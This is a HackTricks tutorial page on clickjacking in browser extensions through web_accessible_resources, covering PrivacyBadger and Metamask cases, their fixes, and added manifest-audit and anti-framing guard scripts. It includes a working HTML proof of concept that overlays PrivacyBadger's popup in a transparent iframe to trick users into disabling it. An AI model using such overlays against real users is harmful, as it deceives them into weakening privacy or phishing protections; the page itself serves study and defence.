# BrowExt - ClickJacking
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
This page shows how a ClickJacking vulnerability in a browser extension can be abused.\
If you don't know what ClickJacking is, check:
{% content-ref url="../clickjacking.md" %}
[clickjacking.md](../clickjacking.md)
{% endcontent-ref %}
An extension contains the file **`manifest.json`**, and that JSON file has a field `web_accessible_resources`. Here is what the [Chrome docs](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) say about it:
> These resources will then be available in a webpage via the URL **`chrome-extension://[PACKAGE ID]/[PATH]`**, which can be generated with the **`extension.getURL method`**. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
The **`web_accessible_resources`** of a browser extension are not just reachable from the web; they also run with the extension's own privileges. This means they are able to:
* Change the extension's state
* Load additional resources
* Interact with the browser to a certain extent
However, this feature presents a security risk. If a resource listed in **`web_accessible_resources`** has any significant functionality, an attacker can embed that resource in an external web page. Unsuspecting users visiting that page may inadvertently trigger the embedded resource. Such a trigger can have unintended consequences, depending on the permissions and capabilities of the extension's resources.
## PrivacyBadger Example
In the PrivacyBadger extension, a vulnerability was identified because the `skin/` directory was declared in `web_accessible_resources` in the following way (check the [original blog post](https://blog.lizzie.io/clickjacking-privacy-badger.html)):
```json
"web_accessible_resources": [
  "skin/*",
  "icons/*"
]
```
This configuration created a security issue. Specifically, the file `skin/popup.html`, which is displayed when the user interacts with the PrivacyBadger icon in the browser, could be embedded inside an `iframe`. That embedding could be used to trick users into unknowingly clicking "Disable PrivacyBadger for this Website". Such an action would compromise the user's privacy by disabling PrivacyBadger's protection and potentially exposing the user to more tracking. A visual demonstration of this exploit can be watched in the ClickJacking video example provided at [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm).
To address this vulnerability, a straightforward fix was implemented: **remove `/skin/*` from the `web_accessible_resources` list**. This change mitigated the risk by ensuring that the contents of the `skin/` directory could no longer be loaded or framed as web-accessible resources.
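As an added example (not HackTricks' or PrivacyBadger's own code), the following Node.js script audits the `web_accessible_resources` of a manifest against the files shipped in the package and reports every HTML document a web page could load in an `<iframe>`. It handles both the MV2 list form and the MV3 `[{resources, matches}]` form; the package listing and manifests are constructed to mirror the PrivacyBadger case above.

```javascript
// Added audit example, not the extension's or HackTricks' code.
// Constructed package listing and manifests mirroring the PrivacyBadger case.
const PACKAGE_FILES = ['skin/popup.html', 'skin/popup.js', 'skin/popup.css',
                       'icons/badger-16.png', 'icons/badger-128.png', 'js/background.js'];
const VULNERABLE_MANIFEST = { manifest_version: 2,
  web_accessible_resources: ['skin/*', 'icons/*'] };
const FIXED_MANIFEST = { manifest_version: 2,
  web_accessible_resources: ['icons/*'] };

// Normalise both manifest versions into [{ resources, matches }].
function normalise(manifest) {
  const war = manifest.web_accessible_resources || [];
  if (war.every((e) => typeof e === 'string')) {
    // MV2: a flat list of patterns, reachable from every origin.
    return [{ resources: war, matches: ['<all_urls>'] }];
  }
  // MV3: each entry restricts which origins may load its resources.
  return war.map((e) => ({ resources: e.resources || [], matches: e.matches || [] }));
}

// Resource patterns only use '*' as a wildcard; everything else is literal.
function patternToRegExp(pattern) {
  const escaped = pattern.replace(/[.+?^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '.*');
  return new RegExp('^' + escaped + '$');
}

// Returns [{ file, pattern, matches }] for every HTML document a page could frame.
function framableHtml(manifest, files) {
  const findings = [];
  for (const entry of normalise(manifest)) {
    for (const pattern of entry.resources) {
      const re = patternToRegExp(pattern);
      for (const file of files) {
        if (re.test(file) && /\.html?$/i.test(file)) {
          findings.push({ file, pattern, matches: entry.matches });
        }
      }
    }
  }
  return findings;
}

for (const f of framableHtml(VULNERABLE_MANIFEST, PACKAGE_FILES)) {
  console.log(`[!] ${f.file} exposed by "${f.pattern}" to ${f.matches.join(', ')}`);
}
```

Run it against a real `manifest.json` by replacing the constructed manifest and listing the unpacked extension directory; every reported file is a candidate for the `iframe` trick shown in the PoC below.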
### PoC
```html
<!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->
<style>
  /* The extension popup is stacked over the page and made almost transparent */
  iframe {
    width: 430px;
    height: 300px;
    opacity: 0.01;
    position: absolute;
  }
  #stuff {
    position: absolute;
  }
  /* The decoy button is placed where the popup's "Disable" control renders */
  button {
    position: absolute;
    top: 168px;
    left: 100px;
  }
</style>
<div id="stuff">
  <h1>Click the button</h1>
  <button id="button">click me</button>
</div>
<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html"></iframe>
```
## Metamask Example
A [**blog post about a ClickJacking in Metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In this case, Metamask fixed the vulnerability by checking that the protocol used to access the page was **`https:`** or **`http:`** (not **`chrome:`**, for example):
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>
**Another ClickJacking fixed** in the Metamask extension was that users were able to **Click to whitelist** when a page was suspected of being phishing, because of `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. Since that page was vulnerable to ClickJacking, an attacker could abuse it by showing something ordinary so the victim clicked to whitelist without noticing, and then send them back to the phishing page, which would now be whitelisted.
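As an added example (not Metamask's actual fix), here is the kind of guard an extension page can run before wiring up a sensitive control such as "whitelist this site": it treats the page as untrusted when it is framed or when it was not loaded from an extension origin. Combining the protocol check with a top-frame check, and the `moz-extension:` scheme, are my assumptions; `win` and `doc` are injected so the logic can be exercised outside a browser.

```javascript
// Added defensive example, not code from Metamask or HackTricks.
// Classifies the context the page is running in.
function describeContext(win) {
  const framed = win.top !== win.self;
  const protocol = win.location.protocol;
  // chrome-extension: (Chromium) and moz-extension: (Firefox) are assumptions.
  const extensionOrigin = protocol === 'chrome-extension:' || protocol === 'moz-extension:';
  return { framed, protocol, extensionOrigin };
}

// The decision the page acts on; sensitive buttons are only enabled when allowed.
function sensitiveActionsAllowed(win) {
  const ctx = describeContext(win);
  if (ctx.framed) return { allowed: false, reason: 'page is framed' };
  if (!ctx.extensionOrigin) return { allowed: false, reason: `unexpected protocol ${ctx.protocol}` };
  return { allowed: true, reason: 'top-level extension page' };
}

// Applies the decision to the DOM: every element marked data-sensitive is
// disabled unless the page is a top-level extension page.
function applyGuard(win, doc) {
  const decision = sensitiveActionsAllowed(win);
  for (const el of doc.querySelectorAll('[data-sensitive]')) {
    el.disabled = !decision.allowed;
  }
  return decision;
}

// Constructed stand-ins for window/document objects (no browser needed).
const topLevel = { location: { protocol: 'chrome-extension:' } };
topLevel.top = topLevel; topLevel.self = topLevel;
const framedPage = { top: {}, location: { protocol: 'chrome-extension:' } };
framedPage.self = framedPage;
const whitelistButton = { disabled: false };
const fakeDoc = { querySelectorAll: () => [whitelistButton] };

console.log(applyGuard(framedPage, fakeDoc), 'button disabled:', whitelistButton.disabled);
```

In a real popup, `applyGuard(window, document)` runs before any click handler is attached, so a click delivered through an overlaid frame hits a disabled control.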
## Steam Inventory Helper Example
Check the following page to see how an **XSS** in a browser extension was chained with a **ClickJacking** vulnerability:
{% content-ref url="browext-xss-example.md" %}
[browext-xss-example.md](browext-xss-example.md)
{% endcontent-ref %}
## References
* [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
* [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)